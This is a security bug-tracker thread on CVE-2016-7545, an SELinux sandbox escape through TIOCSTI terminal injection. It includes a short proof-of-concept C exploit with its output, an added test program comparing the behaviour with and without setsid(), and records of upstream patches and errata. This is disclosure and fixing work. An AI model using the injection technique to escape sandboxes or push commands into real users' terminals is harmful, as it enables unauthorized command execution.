Hi,

When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

/* Push "id\n" into the controlling terminal's input queue one byte at a time,
 * as if it had been typed, then exec a harmless command.  The sandbox shares
 * the terminal with the parent shell, so the shell reads the injected line
 * and runs it outside the sandbox. */
int main(void)
{
    const char *cmd = "id\n";
    while (*cmd)
        ioctl(0, TIOCSTI, cmd++);   /* TIOCSTI takes one character per call */
    execlp("/bin/id", "id", NULL);
    return 1;                       /* only reached if execlp() fails */
}
$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
[saken@ghetto ~]$ id <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

This is similar to CVE-2016-2568, CVE-2016-2779, etc.

Thanks,
Federico Bento.
Upstream mailing list discussion: * https://marc.info/?t=147463464400001&r=1&w=2
Created policycoreutils tracking bugs for this issue: Affects: fedora-all [bug 1378932]
Upstream fixes: * https://marc.info/?l=selinux&m=147465156612756&w=2 * https://marc.info/?l=selinux&m=147466045909969&w=2
This was assigned CVE-2016-7545.
References: http://seclists.org/oss-sec/2016/q3/606
(In reply to Paul Moore from comment #4)
> Upstream fixes:
>
> * https://marc.info/?l=selinux&m=147465156612756&w=2

To be clear, the patch above is not strictly necessary, but very helpful.

    commit 5b98f39de5119dcc865f6c7923682fb10219d45a
    Author: Petr Lautrbach <plautrba>
    Date:   Fri Sep 23 19:24:15 2016 +0200

        sandbox: do not try setup directories without -X or -M

        sandbox tried to copy all affected files to the new home or tmp even
        though -M or -X was not specified and there was no new directory.

        Fixes:

        $ sandbox ls ~
        /usr/bin/sandbox: [Errno 17] File exists: '/root'

        Signed-off-by: Petr Lautrbach <plautrba>

> * https://marc.info/?l=selinux&m=147466045909969&w=2

This is the patch that fixes the vulnerability.

    commit acca96a135a4d2a028ba9b636886af99c0915379
    Author: Petr Lautrbach <plautrba>
    Date:   Fri Sep 23 19:24:16 2016 +0200

        sandbox: create a new session for sandboxed processes

        It helps to prevent sandboxed processes from injecting arbitrary
        commands into the parent.

        Signed-off-by: Petr Lautrbach <plautrba>
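The reason a new session closes this hole is the kernel-side check in tiocsti(): TIOCSTI is refused with EPERM when the target tty is not the caller's controlling terminal and the caller lacks CAP_SYS_ADMIN. A process that has called setsid() is in a fresh session with no controlling terminal, so even though it still holds the inherited stdin fd, the ioctl on it fails. The program below is an added demonstration of both halves of the report, not code from the bug report or from the policycoreutils patch. It creates its own pseudo-terminal (posix_openpt) and a helper "login session" process so it can be run from a non-interactive environment, then runs a "sandboxed" grandchild with and without setsid() and reports what ioctl(0, TIOCSTI) returned in each case. The function name tiocsti_probe and the exit-code convention are this example's own. It assumes a Linux kernel; on kernels built with CONFIG_LEGACY_TIOCSTI=n, or with dev.tty.legacy_tiocsti=0, both probes return EIO because the ioctl is disabled entirely, and a caller holding CAP_SYS_ADMIN is allowed through in both cases.

```c
/* Added demonstration for CVE-2016-7545 (not from the report or the fix):
 * a process sharing its parent's controlling tty can inject keystrokes with
 * TIOCSTI; after setsid(), as the fixed sandbox does, the same ioctl fails
 * with EPERM for an unprivileged caller.  Build: gcc -o tiocsti_demo tiocsti_demo.c */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run one "sandboxed" process whose stdin is a fresh pty that is the
 * controlling terminal of its parent, and report what ioctl(0, TIOCSTI)
 * returned there: 0 on success, the errno value on failure, -1 if the pty
 * or the helper processes could not be set up.  detach != 0 makes the
 * sandboxed process call setsid() first (what the upstream fix adds). */
int tiocsti_probe(int detach)
{
    int master = posix_openpt(O_RDWR | O_NOCTTY);
    if (master < 0 || grantpt(master) < 0 || unlockpt(master) < 0)
        return -1;
    const char *name = ptsname(master);
    if (name == NULL)
        return -1;
    char slave_path[64];
    snprintf(slave_path, sizeof slave_path, "%s", name);

    /* First child plays the user's login session: it becomes a session
     * leader, and opening the slave without O_NOCTTY makes the pty its
     * controlling terminal (exit codes >= 250 are setup failures). */
    pid_t session = fork();
    if (session < 0)
        return -1;
    if (session == 0) {
        if (setsid() < 0)
            _exit(250);
        int slave = open(slave_path, O_RDWR);
        if (slave < 0 || dup2(slave, STDIN_FILENO) < 0)
            _exit(251);

        /* Second child plays the sandboxed program: it inherits stdin, the
         * tty, exactly as a child of the sandbox does. */
        pid_t sandboxed = fork();
        if (sandboxed < 0)
            _exit(252);
        if (sandboxed == 0) {
            if (detach && setsid() < 0)   /* the fix: leave the parent's session */
                _exit(253);
            char keystroke = 'x';
            if (ioctl(STDIN_FILENO, TIOCSTI, &keystroke) < 0)
                _exit(errno);             /* EPERM expected after setsid() */
            _exit(0);                     /* 'x' now sits in the tty input queue */
        }
        int status;
        if (waitpid(sandboxed, &status, 0) < 0 || !WIFEXITED(status))
            _exit(254);
        _exit(WEXITSTATUS(status));
    }

    int status;
    int rc = (waitpid(session, &status, 0) < 0 || !WIFEXITED(status))
                 ? -1 : WEXITSTATUS(status);
    close(master);
    return rc >= 250 ? -1 : rc;
}

/* Human-readable meaning of a probe result, for the stand-alone run. */
static const char *describe(int rc)
{
    if (rc == 0)     return "ioctl succeeded: keystroke injected into the shared tty";
    if (rc == EPERM) return "EPERM: caller has no controlling tty matching the target";
    if (rc == EIO)   return "EIO: TIOCSTI disabled kernel-wide (legacy_tiocsti=0)";
    if (rc < 0)      return "could not set up the pty or helper processes";
    return strerror(rc);
}

int main(void)
{
    printf("without setsid(): %s\n", describe(tiocsti_probe(0)));
    printf("with setsid():    %s\n", describe(tiocsti_probe(1)));
    return 0;
}
```

Run it as an unprivileged user on a kernel with TIOCSTI enabled and the first line reports success while the second reports EPERM; that pair is exactly the behaviour the second upstream commit relies on. Note that setsid() alone protects the parent's terminal, not the sandboxed process: the injected characters are still deliverable by anyone who does share the tty, which is why newer kernels offer the option of disabling TIOCSTI altogether.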
Created attachment 1205640 [details] Basic SRPM patch against Rawhide (no changelog or rev bumps)
Created attachment 1205641 [details] Rawhide patch (policycoreutils-2.5-17.fc26.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15848819
Created attachment 1205642 [details] F25 patch (policycoreutils-2.5-17.fc25.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15848928
Created attachment 1205646 [details] F24 patch (policycoreutils-2.5-14.fc24.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15849131
Created attachment 1205663 [details] F23 patch (policycoreutils-2.4-22.fc23.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15849416
Created attachment 1205679 [details] RHEL-7.3 patch (policycoreutils-2.5-9.el7.src.rpm)
Created attachment 1205701 [details] RHEL-6.9 patch (policycoreutils-2.0.83-30.el6.src.rpm)
NOTE: It looks like we did not backport the SELinux sandbox code to RHEL-5.x.
NOTE: While I've backported and done scratch builds for Rawhide, F25, F24, F23, RHEL-7.3, and RHEL-6.9, I haven't yet had a chance to verify these patches/builds.
This issue has been addressed in the following products: Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 6 Via RHSA-2016:2702 https://rhn.redhat.com/errata/RHSA-2016-2702.html
This issue has been addressed in the following products: Red Hat Enterprise Linux 7.1 Extended Update Support Via RHSA-2017:0536 https://rhn.redhat.com/errata/RHSA-2017-0536.html
This issue has been addressed in the following products: Red Hat Enterprise Linux 7.2 Extended Update Support Via RHSA-2017:0535 https://rhn.redhat.com/errata/RHSA-2017-0535.html